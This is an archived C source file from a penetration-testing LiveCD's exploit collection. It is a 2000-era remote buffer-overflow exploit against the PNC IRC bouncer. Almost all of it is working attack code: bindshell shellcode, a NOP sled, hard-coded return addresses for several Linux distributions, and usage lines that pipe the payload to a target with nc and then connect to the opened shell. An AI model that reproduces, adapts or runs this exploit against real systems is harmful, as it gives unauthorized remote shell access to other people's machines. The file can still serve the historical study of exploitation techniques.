home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / irc / bnc / bnc-xppnc.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  3KB  |  65 lines
  1. /* PNC Bouncer Xploit por RaiSe           [2000]*/
  2. /* Testeado en version 1.11               [2000]*/
  3. /*                                        [2000]*/
  4. /* Offset en RedHat 6.0 0xbffffb24        [2000]*/
  5. /* Offset en SuSe 6.3 0xbffff824 (Thx |QuasaR|) */
  6. /* Offset en Mandrake 6.0 0xbffff3e4 (Thx PowR) */
  7. /* bindshell by ADM                       [2000]*/
  8. /*                                        [2000]*/
  9. /* UNDERSEC Security Team                 [2000]*/
  10. /* http://www.undersec.com                [2000]*/
  11.  
  12. #include <stdio.h>
  13.  
  14. int i;
  15. char *ptr;
  16. unsigned long *ptr2,dire;
  17. char bindshell[] =
  18.   "\x33\xDB\x33\xC0\xB0\x1B\xCD\x80\x33\xD2\x33\xc0\x8b\xDA\xb0\x06"
  19.   "\xcd\x80\xfe\xc2\x75\xf4\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x62"
  20.   "\xeb\x62\x5e\x56\xac\x3c\xfd\x74\x06\xfe\xc0\x74\x0b\xeb\xf5\xb0"
  21.   "\x30\xfe\xc8\x88\x46\xff\xeb\xec\x5e\xb0\x02\x89\x06\xfe\xc8\x89"
  22.   "\x46\x04\xb0\x06\x89\x46\x08\xb0\x66\x31\xdb\xfe\xc3\x89\xf1\xcd"
  23.   "\x80\x89\x06\xb0\x02\x66\x89\x46\x0c\xb0\xff\x66\x89\x46\x0e\x8d"
  24.   "\x46\x0c\x89\x46\x04\x31\xc0\x89\x46\x10\xb0\x10\x89\x46\x08\xb0"
  25.   "\x66\xfe\xc3\xcd\x80\xb0\x01\x89\x46\x04\xb0\x66\xb3\x04\xcd\x80\xeb\x04"
  26.   "\xeb\x4c\xeb\x52\x31\xc0\x89\x46\x04\x89\x46\x08\xb0\x66\xfe\xc3\xcd\x80"
  27.   "\x88\xc3\xb0\x3f\x31\xc9\xcd\x80\xb0\x3f\xfe\xc1\xcd\x80\xb0\x3f\xfe\xc1"
  28.   "\xcd\x80\xb8\x2e\x62\x69\x6e\x40\x89\x06\xb8\x2e\x73\x68\x21\x40\x89\x46"
  29.   "\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e"
  30.   "\x08\x8d\x56\x0c\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\x45\xff\xff"
  31.   "\xff\xFF\xFD\xFF\x50\x72\x69\x76\x65\x74\x20\x41\x44\x4D\x63\x72\x65\x77"; 
  32.  
  33. char buffer[1091];
  34.  
  35. int main(int argc, char *argv[])
  36. {
  37.   if (argc<3) {
  38.     printf("\nPNC Bouncer Xploit por RaiSe");
  39.     printf("\nUNDERSEC Security TEAM\nhttp://www.undersec.com");
  40.     printf("\n\nModo de empleo: %s offset n | nc host puerto\n",argv[0]);
  41.     printf("                nc host 65280\n\n");
  42.     printf("n=1 - RedHat 6.0\nn=2 - SuSe 6.3\nn=3 - Mandrake 6.0\noffset normalmente 0 (en mandrake 1200)\n\n");
  43.     exit(0);
  44.   }
  45.  
  46.   if ((strcmp(argv[2],"1")) == 0) { dire=0xbffffb24; }
  47.   if ((strcmp(argv[2],"2")) == 0) { dire=0xbffff824; }
  48.   if ((strcmp(argv[2],"3")) == 0) { dire=0xbffff3e4; }
  49.  
  50.   for(i=0;i<1091;i++)
  51.     buffer[i]=0x00;
  52.     ptr=buffer;
  53.  
  54.   for(i=0;i<1011-strlen(bindshell);i++)
  55.     *(ptr++)=0x90;
  56.   for(i=0;i<strlen(bindshell);i++)
  57.     *(ptr++)=bindshell[i];
  58.   ptr2=(long *)ptr;
  59.   for(i=0;i<20;i++)
  60.     *(ptr2++)=dire+atoi(argv[1]);
  61.  
  62.   sleep(4);
  63.   printf("USER %s\n",buffer);
  64. }
  65. /*                    www.hack.co.za           [19 July 2000]*/